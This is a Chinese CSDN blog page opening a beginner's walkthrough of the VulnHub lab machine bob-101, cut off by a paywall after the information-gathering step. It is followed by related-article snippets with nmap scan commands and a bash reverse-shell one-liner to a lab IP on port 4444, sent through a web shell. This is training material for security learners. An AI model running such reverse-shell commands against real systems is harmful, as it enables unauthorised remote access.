初学靶场:bob-101

最新推荐文章于 2024-07-22 06:34:25 发布
最新推荐文章于 2024-07-22 06:34:25 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: 渗透测试 靶机 文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/circle_monkey/article/details/120686386
版权

文章目录

前言

作为一名网络安全的初学者,本篇文章对自己在学习过程中所练习的靶机进行梳理和总结,以便日后参考和回忆。

以下是本篇文章正文内容,下面案例可供参考

一、bob-101

①基本介绍:
名称:bob-101(鲍勃:1.0.1)
发布时间:2018 年 3 月 9 日
作者:c0rruptedb1t
难易程度:初级、中级
下载地址:链接
②使用设备:
靶机1台:bob-101
渗透机1台:kali liunx

二、渗透方法

内网靶机渗透流程

1.信息收集

信息收集作为靶机渗透的第一步,目的是搜集靶机的基础信息,为下一步渗透奠定基础。
作为内网靶机,需要搜集的要素较少:
①靶机IP地址
②靶机开放端口

最低0.47元/天 解锁文章
circle_monkey
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透实验(初学者)
weixin_58445075的博客
04-01 360
CD-1靶机渗透 靶机:CD-1 靶机下载地址:http://www.vulnhub.com/?q=DC-1 攻击机:Kali 镜像可私聊找我要哦~~~~ 第一步:查看ip地址 ifconfig查看攻击机ip(因为我的攻击机和靶机在同网段) 查看靶机ip(同网段存货主机) namp -sP 192.168.60.0/24(根据自己的攻击机网段来进行查看) 第二步:开放80端口 我们可以浏览一下网页 Drupal!!! 这里简单介绍一下 drupal是一个由php语言开...
渗透入门之BOB靶机渗透实战
CongM_JueD的博客
09-03 832
渗透入门初体验
vulnhub靶场Bob_v1.0.1
kukudeshuo的博客
08-27 948
vulnhub靶场Bob_v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bob-101,226/ 攻击机:kali(192.168.109.128) 靶机Bob_v1.0.1(192.168.109.172) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.172 使用nmap扫描查看目标靶机
【vulnhub靶场Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 236
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
kubelabs:Kubernetes-初学者| 中级| 高级
02-03
终极Kubernetes动手实验室先决条件:准备5节点Kubernetes集群密码:GKEMac版Docker桌面的Ubuntu 使用Kubectl 豆荚101 副本集101部署101排程器101服务101状态集101守护进程101乔布斯101入口101RBAC101服务目录101 ...
本地靶场搭建--常见靶场环境集锦
04-28
网络安全领域,靶场靶场环境)是用于模拟真实网络环境并进行安全测试和学习的重要工具。"本地靶场搭建--常见靶场环境集锦" 提供了一系列经典的靶场平台,帮助用户深入理解并实践各种安全漏洞。下面将详细介绍...
DVWA靶场的安装-超详细
05-29
**DVWA靶场安装指南** DVWA(Damn Vulnerable ...总之,DVWA靶场是一个极好的学习资源,无论你是初学者还是经验丰富的安全专家,都能从中受益。记得在实践时保持合法和道德,不要对真实网站进行未经许可的渗透测试。
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室...对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室...对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 917
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 1972
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
bob靶机
weixin_52963334的博客
08-14 682
bob靶机实操
靶机渗透之BOb1
2301_76227305的博客
02-12 1417
反弹shell命令的使用解密命令的使用在这里理清一下用户这个玩意,一开始我们进入到home目录里面发现有三个用户。但现在我们是没有身份的,只能看一下普通的文件和执行一些普通的命令,这也是为啥我们一开始执行解密命令没权限。但我们发现jc用户的密码,登录jc用户获取身份了。那我们便就可以执行解密的命令,然后获取bob的密码。最后登录bob用户,发现bob用户在root组里面,可以变成root用户。那为啥jc不能变成root用户呢,因为它不在root组里面。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 2982
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
【JS逆向课件:第十三课:异步爬虫】
最新发布
weixin_50556117的博客
07-22 1050
现在大部分视频客户端都采用HTTP Live Streaming(HLS,Apple为了提高流播效率开发的技术),而不是直接播放MP4等视频文件。HLS技术的特点是将流媒体切分为若干【TS片段】(比如几秒一段),然后通过一个【M3U8列表文件】将这些TS片段批量下载供客户端播放器实现实时流式播放。因此,在爬取HLS的流媒体文件的思路一般是先【下载M3U8文件】并分析其中内容,然后在批量下载文件中定义的【TS片段】,最后将其【组合】成mp4文件或者直接保存TS片段。
Linux:基础命令学习
qq_55038440的博客
07-20 1146
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值